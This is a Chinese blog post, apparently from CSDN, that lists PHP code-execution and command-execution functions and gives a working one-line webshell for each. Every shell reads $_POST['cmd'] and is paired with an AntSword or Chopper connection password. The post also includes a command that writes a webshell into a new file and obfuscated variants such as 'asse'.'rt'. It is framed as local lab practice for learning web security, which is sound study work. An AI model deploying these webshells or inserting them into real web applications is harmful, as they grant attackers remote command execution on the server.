PHP常见的命令执行函数与代码执行函数

已于 2023-06-25 19:16:14 修改
阅读量4.3k 收藏 33
点赞数 7
文章标签: php 网络安全 web安全
于 2023-06-23 14:36:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45945842/article/details/131340759
版权

目录

代码执行函数:

1. eval()

GET和POST传参的区别 

2. assert()

3. call_user_func()

4. create_function()

5. array_map()

6. call_user_func_array()

7. array_filter()

​编辑

8. uasort()函数

9. preg_replace()

命令执行函数:

1. system()

2. passthru()

3. exec()

4. pcntl_exec()

5. shell_exec()

6. popen()/proc_open()

7. 反引号 ``

代码执行函数:

前提准备:火狐插件 Quantum  Hackbar (或者hackbar)      phpstudy  

首先打开phpstudy  在phpstudy 下的www目录中创建一个1.php文件,接下来的实验均在1.php中进行。

注意:php代码中函数前加@意味着他会屏蔽掉出错信息,而不报错,避免通过错误回显来推测数据库结构,对其进行攻击。

1. eval()

命令执行:cmd=system(ipconfig);
蚁剑连接密码:cmd

 注意:eval要以分号结尾  传入的参数必须为php代码

<?php @eval($_POST['cmd']);?>

GET和POST传参的区别 

 这里用的是POST型传参   POST型传参通过request  body 传参   而GET型传参把参数包含在url中

 可以使用<pre>标签来使结果规范化

 <?php 
 echo "<pre>";
 echo eval($_POST["cmd"]);
 echo "</pre>";
 ?>

2. assert()

 命令执行:cmd=system(whoami)
    菜刀连接密码:cmd
 
<?php @assert($_POST['cmd']);?>

3. call_user_func()

传入的参数作为assert函数的参数
    命令执行:cmd=system(whoami)
    蚁剑连接密码:cmd
 
<?php call_user_func("assert",$_POST['cmd']); ?>
这里的  assert  是被调用的回调函数,其余为回调函数的参数。

 

<?php
call_user_func($_POST["dys"],$_POST["add"]);
?>
这里dys=assert;  add=phpinfo();

4. create_function()

创建匿名函数执行代码
执行命令和上传文件参考eval函数(必须加分号)。
<?php $func =create_function('',$_POST['cmd']);$func(); ?>

 第一个变量表示定义一个函数变量部分  第二个变量表示执行的代码部分

5. array_map()

array_map() 函数
将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。
回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。
    
<?php
    $func=$_GET['dys'];
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    $new_array=array_map($dys,$array);
    echo $new_array;
?>

 这个函数作用是为数组每个元素应用回调函数。

6. call_user_func_array()

将传入的参数作为数组的第一个值传递给assert函数
    cmd=system(phpinfo();)
   
<?php
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    call_user_func_array("assert",$array);
?>

7. array_filter()

array_filter — 使用回调函数过滤数组的元素

<?php
    $cmd=$_POST['cmd'];
    $array1=array($cmd);
    $func =$_GET['dys'];
    array_filter($array1,$func);
?>
命令执行:cmd=whoami  dys=system

8. uasort()函数

uasort () 函数使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。 如果成功则返回 TRUE,否则返回 FALSE。

<?php
    uasort($_GET,'asse'.'rt');
?>

9. preg_replace()

preg_replace('正则规则','替换字符','目标字符')
执行命令和上传文件参考assert函数(不需要加分号)。
将目标字符中符合正则规则的字符替换为替换字符,此时如果正则规则中使用/e修饰符,则存在代码执行漏洞。
preg_replace("/test/e",$_POST["cmd"],"jutst test");

命令执行函数:

1. system()

蚁剑连接密码:cmd
<?php
echo "<pre>";
system($_POST["cmd"]);
?>

 在POST命令框输入cmd=ipconfig  即可在页面出现信息

 还可以用echo写入一句话木马,来进行连接

cmd=echo "<?php @eval($_POST['dys']);?>" >> dys.php

 

 

2. passthru()

passthru — 执行外部程序并且显示原始输出

蚁剑连接密码:cmd
<?php
@passthru($_POST['cmd']);
?>

 cmd=ipconfig 即可显示信息

3. exec()

这个函数有点特殊,他只输出最后一行

并且他的输出需要自己打印。(即用echo打印出来)

蚁剑连接密码:cmd
<?php
echo "<pre>"
echo exec($_POST['cmd']);
echo "</pre>"
?>

 

4. pcntl_exec()

pcntl_exec — 在当前进程空间执行指定程序

pcntl_exec(string $path, array $args = [], array $env_vars = []): bool

以给定参数执行程序

path

path 必须时可执行二进制文件路径或一个在文件第一行指定了 一个可执行文件路径标头的脚本(比如文件第一行是 #!/usr/local/bin/perl 的 perl 脚本)。 更多的信息请查看您系统的 execve(2)手册。

args

args 是一个要传递给程序的参数的字符串数组。

env_vars

env_vars 是一个要传递给程序作为环境变量的字符串数组。这个数组是 key => value 格式的,key 代表要传递的环境变量的名称,value 代表该环境变量值。

5. shell_exec()

shell_exec — 通过 shell 执行命令并将完整的输出以字符串的方式返回

蚁剑连接密码:cmd
<?php
echo "shell_exec($_POST['cmd'])";
?>

 

6. popen()/proc_open()

该函数也可以将字符串当作OS命令来执行,但是该函数返回的是文件指针而非命令执行结果。该函数有两个参数。

<?php
$cmd=$_POST['cmd'].">>1.txt";  
popen("$cmd",'r');
?>
$cmd将文件查询结果放入1.txt  popen将该文件赋予可读权限
在linux里,命令为
popen("/bin/ls",'r');

 

 

7. 反引号 ``

[``]反引号里的东西也会被当成系统命令执行

whoami可以直接执行

<?php
echo `whoami`
?>

<?php
echo "<pre>";
$cmd=$_GET["cmd"];
echo `$cmd`;
echo "</pre>";
?>

长安十三朝❀
关注
  • 7
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
php时间人性化展示
赛时科技
04-22 147
函数,用于将时间戳转换为人性化的时间差。该函数遍历了不同的时间单位,找到合适的单位来表示时间差,并返回相应的字符串。这样,你就可以根据需要将时间以人性化的方式展示给用户了。你可以根据具体需求调整时间格式和单位。函数将其格式化为"年-月-日 时:分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的时间戳,并使用。函数来实现时间的人性化展示。函数将"-2 days"转换为时间戳),然后调用。最后,我们假设有一个过去的时间戳(这里使用。函数将其转换为人性化的时间差,并输出结果。
PHP 执行系统命令函数
cheers_bin的博客
04-04 3924
PHP命令执行函数有很多,最常见的有以下几种: 1、system string system(string command,int &return_var) 可以用来执行系统命令并将相应的执行结果输出 2、exec string exec(string command,array &outpub,int &return_var) command是要执行命令,output是获得执行命令输出的每一行字符串,return_var存放执行命令后的状态值。 注意:exec输出的是命令执行结果
c# 执行事务函数代码
10-29
c#下 执行多条sql语句,实现事务
PHP中如何判断exec函数执行成功?
12-19
前言 做一个代码发布的系统,需要用到PHP的exec函数执行Linux下的命令和git,svn命令,如何判断PHP的exec函数是否执行成功呢? 解决方案 写个PHP文件来做实验: exec函数第一个参数是执行命令,第二个参数是执行的结果,第三个参数是执行的状态。 <?php exec('ls', $log, $status); print_r($log); print_r($status); echo PHP_EOL; 执行这个php文件: 这里$log,$status输出结果如图。 但是$status为0,给人的感觉是执行失败,其实不是,这是exec执行成功。 改一下这个php文件
js代码-自执行函数
07-16
js代码-自执行函数
JS 自执行函数原理及用法
10-16
主要介绍了JS 自执行函数原理及技巧,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
PHP-代码执行函数-命令执行函数
weixin_47112073的博客
10-21 6026
简单写一下代码执行函数命令执行函数有哪些,并且说说他们的不同
php 执行命令函数
热门推荐
03-31 16万+
哈尔滨洛弘科技有限公司 php 执行命令函数合集
命令执行函数
qq_58091216的博客
10-04 2272
命令执行
PHP执行外部命令函数盘点
xiaoweids的博客
06-04 275
system()输出并返回最后一行shell结果。exec()不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上...
PHP代码命令执行及绕过
qq_46001025的博客
10-15 465
NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。Linux下支持glob通配符代替 . 或者叫 period,它的作用和source一样,就是用当前的shell执行一个文件中的命令,例如 .file 就是执行file文件中的命令。数组(Array)的第一个字母是A,在php中,如果强制连接数组和字符串的话,数组会转换成字符串,值为Array;sh a-------------------sh会把 a 里面的每行内容当命令执行
PHP执行linux命令6个函数代码实例
01-19
一般情况下,很少会用php执行linux命令,不过特殊情况下,你也许会用到这些函数。以前我知道有二个函数可以执行linux命令,一个是exec,一个是shell_exec。其实有很多的,结合手册内容,介绍以下6个函数。 1,exec...
php代码审计之命令注入(3)
01-09
文章目录system()命令:exec():passthru(...这个函数会将结果直接进行输出,命令成功后返回输出的最后一行,失败 返回FALSE system.php源码如下: <?php $action = $_GET['cmd']; echo ;
php模拟ping命令php exec函数的使用方法)
12-19
使用php模拟我们常用的DOS命令ping命令的方法,这里主要用到的是php的内置函数exec来调用系统的ping命令,从而实现ping命令功能的。复制代码 代码如下:<?php$to_ping=’www.phpernote.com’;$count=2;$psize=66;...
PHP执行系统外部命令
01-21
PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 前提条件 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给...
TCP相关问题总结
最新发布
qq_62835094的博客
04-23 1136
假设TCP是两次握手,则可能会发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此时触发超时重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此会发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不会发送数据,因此会造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 473
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 793
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 543
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
请用php的eval函数执行系统命令pwd
05-31
虽然我之前说过不建议使用 `eval()` 函数执行系统命令,但为了回答你的问题,我可以提供以下代码: ```php <?php eval('$result = `pwd`;'); echo $result; ?> ``` 在这个例子中,我们使用了反引号运算符 ```` 来执行 `pwd` 命令,并将结果直接赋值给变量 `$result`。然后,使用 `echo` 函数将结果输出到屏幕上。 需要注意的是,这种方式非常危险,因为 `eval()` 函数可以执行任意的 PHP 代码,包括恶意代码。在实际开发中,应该尽量避免使用 `eval()` 函数执行系统命令,以免产生安全漏洞。建议使用之前提到的其他函数执行系统命令

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值